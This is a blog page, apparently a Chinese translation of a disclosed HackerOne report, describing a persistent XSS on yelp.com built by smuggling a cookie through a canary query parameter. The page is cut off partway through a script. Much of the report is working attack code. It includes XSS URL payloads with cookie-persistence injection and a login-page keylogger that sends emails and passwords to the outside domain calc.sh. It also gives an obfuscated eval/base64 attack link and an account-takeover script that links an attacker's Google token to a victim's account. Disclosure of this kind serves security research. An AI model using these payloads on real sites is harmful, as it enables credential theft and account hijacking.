<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />


    <meta name="description" content="漏洞赏金：$5500 + $500 报告时间：世界标准时间 2023 年 6 月 2 日下午 2:40提交报告者：lil_endian报告编号  #2010530  已解决 ()报告已提交给 Yelp。已公开 2023年8月15日，协调世界时上午11:59严重性：高（7 ~ 8.9）弱点：跨站脚本（XSS）- 通用耗时：无CVE 编号：无账户解锁：无  总结yelp.com 在返回给用户的HTM">
<meta property="og:type" content="article">
<meta property="og:title" content="【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）">
<meta property="og:url" content="https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/index.html">
<meta property="og:site_name" content="Bealee&#39;s Blog">
<meta property="og:description" content="漏洞赏金：$5500 + $500 报告时间：世界标准时间 2023 年 6 月 2 日下午 2:40提交报告者：lil_endian报告编号  #2010530  已解决 ()报告已提交给 Yelp。已公开 2023年8月15日，协调世界时上午11:59严重性：高（7 ~ 8.9）弱点：跨站脚本（XSS）- 通用耗时：无CVE 编号：无账户解锁：无  总结yelp.com 在返回给用户的HTM">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s2.loli.net/2023/08/18/oGBnX72RHZ45Y3z.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/18/crAmblJXK68aQfi.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/18/8f3IaLSleTHWvG9.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/18/Kqa4enRGk8iVv7x.png">
<meta property="og:image" content="https://s2.loli.net/2023/08/18/lCgMpJYGu1RkQHj.png">
<meta property="article:published_time" content="2023-08-18T14:28:41.797Z">
<meta property="article:modified_time" content="2023-08-18T14:34:23.905Z">
<meta property="article:author" content="Bealee">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2023/08/18/oGBnX72RHZ45Y3z.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="Bealee&#39;s Blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.2"></head>






<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/happy/">Happy</a></li><!--
     --><!--
       --><li><a href="/tag/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/kpi/">Kpi</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/03/17/JavaSE-%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&text=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&is_video=false&description=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）&body=Check out this article: https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&title=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&name=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://bealee008.github.io/2023/08/18/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS%20ATO/&t=【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%8F%E8%BF%B0"><span class="toc-number">2.</span> <span class="toc-text">描述</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E2%80%9Dguvo%E2%80%9D-cookie-%E8%BF%9B%E8%A1%8C%E7%9A%84XSS%E6%94%BB%E5%87%BB"><span class="toc-number">2.1.</span> <span class="toc-text">通过”guvo” cookie 进行的XSS攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE-%E2%80%9Cyelpmainpaastacanary%E2%80%9D-cookie"><span class="toc-number">2.2.</span> <span class="toc-text">设置 “yelpmainpaastacanary” cookie</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8D%9F%E5%9D%8F%E7%9A%84-cookie-%E8%A7%A3%E6%9E%90%E5%92%8C-cookie-%E8%B5%B0%E7%A7%81"><span class="toc-number">2.3.</span> <span class="toc-text">损坏的 cookie 解析和 cookie 走私</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#POCs"><span class="toc-number">2.4.</span> <span class="toc-text">POCs</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9C%A8-biz-yelp-com-x2F-login-%E4%B8%8A%E7%9A%84%E9%94%AE%E7%9B%98%E8%AE%B0%E5%BD%95%E5%99%A8"><span class="toc-number">2.5.</span> <span class="toc-text">在 biz.yelp.com&#x2F;login 上的键盘记录器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87%E9%93%BE%E6%8E%A5-Google-%E8%B4%A6%E6%88%B7%E5%AE%9E%E7%8E%B0%E8%B4%A6%E6%88%B7%E6%8E%A5%E7%AE%A1"><span class="toc-number">2.6.</span> <span class="toc-text">通过链接 Google 账户实现账户接管</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D"><span class="toc-number">3.</span> <span class="toc-text">影响</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        【yelp.com】XSS ATO（通过登录键盘记录器，链接 Google 帐户）
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Bealee</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-08-18T14:28:41.797Z" itemprop="datePublished">2023-08-18</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Hackerone%E6%BC%8F%E6%B4%9E%E6%8A%A5%E5%91%8A-XSS/">Hackerone漏洞报告 - XSS</a>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <blockquote>
<p><u><strong>漏洞赏金：$5500 + $500</strong></u></p>
<p>报告时间：世界标准时间 2023 年 6 月 2 日下午 2:40<br>提交报告者：lil_endian<br>报告编号  #2010530  已解决 ()<br>报告已提交给 Yelp。<br>已公开 2023年8月15日，协调世界时上午11:59<br>严重性：高（7 ~ 8.9）<br>弱点：跨站脚本（XSS）- 通用<br>耗时：无<br>CVE 编号：无<br>账户解锁：无</p>
</blockquote>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>yelp.com 在返回给用户的HTML中反映了cookie“guvo”的内容。在某些情况下，该值没有得到适当转义，导致了XSS漏洞。这可以与另一个问题相结合，即后端未能正确解析用户提供的cookie，从而允许我们将guvo cookie伪装成一个名为yelpmainpaastacanary的cookie。可以通过在对*.yelp.com的任何请求中包含URL查询参数?canary&#x3D;[Cookie值]来设置yelpmainpaastacanary cookie。</p>
<p>此报告展示了如何将此cookie XSS与cookie解析问题链接起来，从而在受害者的浏览器中导致持久性XSS漏洞。为了展示影响，我将展示如何利用此漏洞在<a target="_blank" rel="noopener" href="https://biz.yelp.com/login%E4%B8%8A%E6%B3%A8%E5%85%A5%E9%94%AE%E7%9B%98%E8%AE%B0%E5%BD%95%E5%99%A8%EF%BC%8C%E4%BB%A5%E7%AA%83%E5%8F%96%E5%95%86%E4%B8%9A%E8%B4%A6%E6%88%B7%E7%9A%84%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6/%E5%AF%86%E7%A0%81%EF%BC%8C%E4%BB%A5%E5%8F%8A%E5%A6%82%E4%BD%95%E5%B0%86%E6%94%BB%E5%87%BB%E8%80%85%E7%9A%84Google%E8%B4%A6%E6%88%B7%E4%B8%8E%E5%8F%97%E5%AE%B3%E8%80%85%E7%9A%84Yelp%E8%B4%A6%E6%88%B7%E5%85%B3%E8%81%94%E8%B5%B7%E6%9D%A5%EF%BC%8C%E5%B9%B6%E9%80%9A%E8%BF%87%E2%80%9C%E4%BD%BF%E7%94%A8Google%E8%B4%A6%E6%88%B7%E7%99%BB%E5%BD%95%E2%80%9D%E8%AE%BF%E9%97%AE%E5%8F%97%E5%AE%B3%E8%80%85%E7%9A%84%E8%B4%A6%E6%88%B7%E3%80%82">https://biz.yelp.com/login上注入键盘记录器，以窃取商业账户的电子邮件/密码，以及如何将攻击者的Google账户与受害者的Yelp账户关联起来，并通过“使用Google账户登录”访问受害者的账户。</a></p>
<h2 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h2><h3 id="通过”guvo”-cookie-进行的XSS攻击"><a href="#通过”guvo”-cookie-进行的XSS攻击" class="headerlink" title="通过”guvo” cookie 进行的XSS攻击"></a>通过”guvo” cookie 进行的XSS攻击</h3><p>在一些页面上，cookie guvo 的值被反映（未转义）。最有趣的是在 <a target="_blank" rel="noopener" href="http://www.yelp.com/">www.yelp.com</a> 的首页以及 <a target="_blank" rel="noopener" href="https://biz.yelp.com/login">https://biz.yelp.com/login</a> 的登录页面上。未经转义的反射发生在 window.ySitRepParams 对象和 window.yelp.guv 属性中。可以通过在浏览器或Burp中将cookie添加到请求中，并观察响应来看到这一点：</p>
<p><a href="https://sm.ms/image/oGBnX72RHZ45Y3z" target="_blank"><img src="https://s2.loli.net/2023/08/18/oGBnX72RHZ45Y3z.png" ></a></p>
<p><a href="https://sm.ms/image/crAmblJXK68aQfi" target="_blank"><img src="https://s2.loli.net/2023/08/18/crAmblJXK68aQfi.png" ></a></p>
<h3 id="设置-“yelpmainpaastacanary”-cookie"><a href="#设置-“yelpmainpaastacanary”-cookie" class="headerlink" title="设置 “yelpmainpaastacanary” cookie"></a>设置 “yelpmainpaastacanary” cookie</h3><p>在 yelp.com 上有一个功能，通过在请求中添加查询参数 ?canary&#x3D;asdf，响应将包含一个 HTTP 头部：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: yelpmainpaastacanary=asdf; Domain=.yelp.com; Path=/; Secure; SameSite=Lax</span><br></pre></td></tr></table></figure>

<p>这为我们提供了一种将yelpmainpaastacanary cookie设置为我们想要的任何值的方法。但是我们需要一种控制 guvo cookie 的方式。事实证明，我们可以将 guvo cookie 偷偷藏在 yelpmainpaastacanary cookie 内部。</p>
<h3 id="损坏的-cookie-解析和-cookie-走私"><a href="#损坏的-cookie-解析和-cookie-走私" class="headerlink" title="损坏的 cookie 解析和 cookie 走私"></a>损坏的 cookie 解析和 cookie 走私</h3><p>Yelp 后端将通过空格而不是分号来解析用户的 cookie。通常，由浏览器发送的 cookie 将会以分号分隔，如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: a=1; b=2;</span><br></pre></td></tr></table></figure>

<p>这应该被解析为一个名为 a 值为 “1 b&#x3D;2” 的 cookie，但 Yelp 将其解析为两个名为 a 和 b 的 cookie。我们可以滥用这一点，通过向以下地址发出请求，将 guvo cookie 偷偷藏在 yelpmainpaastacanary cookie 内：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.yelp.com/?canary=asdf%20guvo%3D%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E</span><br></pre></td></tr></table></figure>

<p><a href="https://sm.ms/image/8f3IaLSleTHWvG9" target="_blank"><img src="https://s2.loli.net/2023/08/18/8f3IaLSleTHWvG9.png" ></a></p>
<p>这将设置 cookie</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: yelpmainpaastacanary=asdf guvo=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;; Domain=.yelp.com; Path=/; Secure; </span><br></pre></td></tr></table></figure>

<p>并导致我们的 XSS 载荷每次访问 <a target="_blank" rel="noopener" href="http://www.yelp.com/">www.yelp.com</a> 的首页时都会触发：</p>
<p><a href="https://sm.ms/image/Kqa4enRGk8iVv7x" target="_blank"><img src="https://s2.loli.net/2023/08/18/Kqa4enRGk8iVv7x.png" ></a></p>
<p>作为额外的奖励，我们还可以注入一个 Max-Age: 99999999 属性，这样我们的 cookie 就不会过期，会一直存在于受害者的浏览器中，等待我们的 XSS 注入发生：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://www.yelp.com/?canary=asdf%20guvo%3D%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3B%20Max%2DAge%3D99999999</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: yelpmainpaastacanary=asdf </span><br><span class="line">guvo=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;; </span><br><span class="line">Max-Age=99999999; </span><br><span class="line">Domain=.yelp.com; </span><br><span class="line">Path=/; Secure; </span><br><span class="line">SameSite=Lax</span><br></pre></td></tr></table></figure>

<h3 id="POCs"><a href="#POCs" class="headerlink" title="POCs"></a>POCs</h3><p>请注意：由于我位于丹麦，yelp.com 将会重定向到 yelp.dk。这些攻击在两个域上的工作方式完全相同。</p>
<h3 id="在-biz-yelp-com-x2F-login-上的键盘记录器"><a href="#在-biz-yelp-com-x2F-login-上的键盘记录器" class="headerlink" title="在 biz.yelp.com&#x2F;login 上的键盘记录器"></a>在 biz.yelp.com&#x2F;login 上的键盘记录器</h3><p>当用户输入或提交登录表单时，以下 JavaScript 片段将泄露 <a target="_blank" rel="noopener" href="https://biz.yelp.com/login">https://biz.yelp.com/login</a> 上电子邮件和密码字段的内容。这些凭据将泄露到我拥有的域名 calc.sh：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">setTimeout</span>(<span class="keyword">function</span> (<span class="params"></span>) &#123;</span><br><span class="line">  a = <span class="variable language_">document</span>.<span class="title function_">getElementsByName</span>(<span class="string">&#x27;password&#x27;</span>)[<span class="number">0</span>];</span><br><span class="line">  b = <span class="variable language_">document</span>.<span class="title function_">getElementsByName</span>(<span class="string">&#x27;email&#x27;</span>)[<span class="number">0</span>];</span><br><span class="line">  <span class="keyword">function</span> <span class="title function_">f</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">fetch</span>(<span class="string">`https://calc.sh/?a=<span class="subst">$&#123;<span class="built_in">encodeURIComponent</span>(a.value)&#125;</span>&amp;b=<span class="subst">$&#123;<span class="built_in">encodeURIComponent</span>(b.value)&#125;</span>`</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  a.<span class="property">form</span>.<span class="property">onclick</span>=f;</span><br><span class="line">  a.<span class="property">onchange</span>=f;</span><br><span class="line">  b.<span class="property">onchange</span>=f;</span><br><span class="line">  a.<span class="property">oninput</span>=f;</span><br><span class="line">  b.<span class="property">oninput</span>=f;</span><br><span class="line">&#125;, <span class="number">1000</span>)</span><br></pre></td></tr></table></figure>

<p>我们创建一个链接，用于设置 guvo cookie 以在登录页面上触发此有效负载。请参阅此 CyberChef 配方，了解其操作方法并轻松进行修改：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://gchq.github.io/CyberChef/#recipe=JavaScript_Minify()To_Base64(&#x27;A-Za-z0-9%2B/%3D&#x27;)Find_/_Replace(%7B&#x27;option&#x27;:&#x27;Regex&#x27;,&#x27;string&#x27;:&#x27;%5E&#x27;%7D,&#x27;asdf%20guvo%3D%3C/script%3E%3Cscript%3Eeval(atob(%5C&#x27;&#x27;,true,false,true,false)Find_/_Replace(%7B&#x27;option&#x27;:&#x27;Regex&#x27;,&#x27;string&#x27;:&#x27;$&#x27;%7D,&#x27;%5C&#x27;))//;Max-Age%3D99999999&#x27;,true,false,true,false)URL_Encode(true)Find_/_Replace(%7B&#x27;option&#x27;:&#x27;Regex&#x27;,&#x27;string&#x27;:&#x27;%5E&#x27;%7D,&#x27;https://yelp.com/?canary%3D&#x27;,true,false,true,false)&amp;input=c2V0VGltZW91dChmdW5jdGlvbiAoKSB7CiAgYSA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlOYW1lKCdwYXNzd29yZCcpWzBdOwogIGIgPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnZW1haWwnKVswXTsKICBmdW5jdGlvbiBmKCkgewogICAgZmV0Y2goYGh0dHBzOi8vY2FsYy5zaC8/YT0ke2VuY29kZVVSSUNvbXBvbmVudChhLnZhbHVlKX0mYj0ke2VuY29kZVVSSUNvbXBvbmVudChiLnZhbHVlKX1gKTsKICB9CiAgYS5mb3JtLm9uY2xpY2s9ZjsKICBhLm9uY2hhbmdlPWY7CiAgYi5vbmNoYW5nZT1mOwogIGEub25pbnB1dD1mOwogIGIub25pbnB1dD1mOwp9LCAxMDAwKQ</span><br></pre></td></tr></table></figure>

<p>我们的最终链接如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://yelp.com/?canary=asdf%20guvo%3D%3C%2Fscript%3E%3Cscript%3Eeval%28atob%28%27c2V0VGltZW91dCgoZnVuY3Rpb24oKXtmdW5jdGlvbiBlKCl7ZmV0Y2goYGh0dHBzOi8vY2FsYy5zaC8%2FYT0ke2VuY29kZVVSSUNvbXBvbmVudChhLnZhbHVlKX0mYj0ke2VuY29kZVVSSUNvbXBvbmVudChiLnZhbHVlKX1gKX1hPWRvY3VtZW50LmdldEVsZW1lbnRzQnlOYW1lKCJwYXNzd29yZCIpWzBdLGI9ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeU5hbWUoImVtYWlsIilbMF0sYS5mb3JtLm9uY2xpY2s9ZSxhLm9uY2hhbmdlPWUsYi5vbmNoYW5nZT1lLGEub25pbnB1dD1lLGIub25pbnB1dD1lfSksMWUzKTs%3D%27%29%29%2F%2F%3BMax%2DAge%3D99999999</span><br></pre></td></tr></table></figure>

<p>任何访问该链接的人都将安装我们的键盘记录器。下面是一个展示其工作过程的简短视频：</p>
<p>视频：<a target="_blank" rel="noopener" href="https://github.com/Bealee008/Hackerone_video/blob/main/biz.yelp.com-keylogger-poc.mp4">https://github.com/Bealee008/Hackerone_video/blob/main/biz.yelp.com-keylogger-poc.mp4</a></p>
<h3 id="通过链接-Google-账户实现账户接管"><a href="#通过链接-Google-账户实现账户接管" class="headerlink" title="通过链接 Google 账户实现账户接管"></a>通过链接 Google 账户实现账户接管</h3><p>将 Google 账户链接到 Yelp 账户的请求是从 <a target="_blank" rel="noopener" href="https://yelp.com/profile_sharing">https://yelp.com/profile_sharing</a> 发出的。在 Google 链接流程中的最终请求是一个 POST 请求，发送到 <a target="_blank" rel="noopener" href="https://www.yelp.dk/google_connect/register%EF%BC%8C%E5%85%B6%E4%B8%AD%E5%8C%85%E5%90%AB">https://www.yelp.dk/google_connect/register，其中包含</a> CSRF 令牌 csrftok 和一个令牌 id_token，该令牌将 Google 账户与 Yelp 账户关联起来。我们可以为我们自己的 Google 账户生成一个令牌，然后使用 XSS 将其链接到受害者的账户上。</p>
<p>要生成一个令牌，我们只需将 Google 账户链接到我们自己的 Yelp 账户，并在 Burp 中拦截最终请求：</p>
<p><a href="https://sm.ms/image/lCgMpJYGu1RkQHj" target="_blank"><img src="https://s2.loli.net/2023/08/18/lCgMpJYGu1RkQHj.png" ></a></p>
<p>现在我们有了用于 Google 账户 <a href="mailto:doodaduguc@gmail.com">doodaduguc@gmail.com</a> 的令牌，我们可以为受害者创建一个 XSS 载荷。在这段代码中，我们向 &#x2F;profile_sharing 发出请求，并使用正则表达式提取 csrf 令牌。然后，我们使用我们准备的 id_token 发出请求，将我们的 Google 账户链接到受害者的账户上：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">function</span> <span class="title function_">f</span>(<span class="params"></span>) &#123;</span><br><span class="line">  a = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span><br><span class="line">  a.<span class="title function_">addEventListener</span>(<span class="string">&#x27;load&#x27;</span>, <span class="keyword">function</span> (<span class="params"></span>) &#123;</span><br><span class="line">    rx = <span class="regexp">/&quot;GoogleConnect&quot;: &quot;([^&quot;]*)/</span>;</span><br><span class="line">    id_token = <span class="string">&quot;eyJhbGciOiJSUzI1NiIsImtpZCI6IjYwODNkZDU5ODE2NzNmNjYxZmRlOWRhZTY0NmI2ZjAzODBhMDE0NWMiLCJ0eXAiOiJKV1QifQ.eyJpc3MiOiJodHRwczovL2FjY291bnRzLmdvb2dsZS5jb20iLCJuYmYiOjE2ODU3MTAxNjEsImF1ZCI6IjY5OTY5MTg5NTcxMS12bTJrOGVnYjMyN2hxM2wwYTdjcnNqMG8ybzlsZW42MS5hcHBzLmdvb2dsZXVzZXJjb250ZW50LmNvbSIsInN1YiI6IjEwNDA0MTA1MzkyMjQ5NDY3MjExNyIsImVtYWlsIjoiZG9vZGFkdWd1Y0BnbWFpbC5jb20iLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiYXpwIjoiNjk5NjkxODk1NzExLXZtMms4ZWdiMzI3aHEzbDBhN2Nyc2owbzJvOWxlbjYxLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tIiwibmFtZSI6IkRhZGUgTXVycGh5IiwicGljdHVyZSI6Imh0dHBzOi8vbGgzLmdvb2dsZXVzZXJjb250ZW50LmNvbS9hL0FBY0hUdGZGVlRFSU5fc3VVV01CTmpjSGFEWHg3TDJlbHFQMTVwNGhLaksxPXM5Ni1jIiwiZ2l2ZW5fbmFtZSI6IkRhZGUiLCJmYW1pbHlfbmFtZSI6Ik11cnBoeSIsImlhdCI6MTY4NTcxMDQ2MSwiZXhwIjoxNjg1NzE0MDYxLCJqdGkiOiJmNzYyZDZlZjEyZmFkNjI5YmE4YTY5OGFhMDNhMGM3NzU4MzYwYWUxIn0.K-XcaABVhUv-WmcpHLCEaDk5reYWH07Ab1QkUxhaGbNQYzt14ViPm2ybiIgJUKhyuwJzzAjllJvtrV2_NrUZnQ0vA_v7PuKO9GQVh72nYx5sWn6LjMsuWLh5d24Vk-Ry1CqC_xs2jEeh03emsZ-1Gha_-ABwlbCDH5yqeepNkh2EaYZ7cKVsUUxnIjpXKrO7xS7zP7aByt0mHA1gUSei-4aal_PVK4zIGa2GyvLCTQ3fqseDz7FCrQYO-3H-VK9O2NiBYZczbz_vLoRQtASeRgbj5jQUtEDjfzK8MTVgvWPVj3EZvt4Bbd0cp_oFmpL1WjMyB9mTtOKBSM3DaWdLNg&quot;</span>;</span><br><span class="line">    b = rx.<span class="title function_">exec</span>(<span class="variable language_">this</span>.<span class="property">responseText</span>);</span><br><span class="line">    <span class="title function_">fetch</span>(<span class="string">&quot;https://www.yelp.dk/google_connect/register&quot;</span>, &#123;<span class="string">&quot;method&quot;</span>: <span class="string">&quot;POST&quot;</span>, <span class="string">&quot;body&quot;</span>: <span class="keyword">new</span> <span class="title class_">URLSearchParams</span>(&#123;<span class="string">&quot;id_token&quot;</span>: id_token, <span class="string">&quot;csrftok&quot;</span>: b[<span class="number">1</span>]&#125;)&#125;)</span><br><span class="line">  &#125;);</span><br><span class="line">  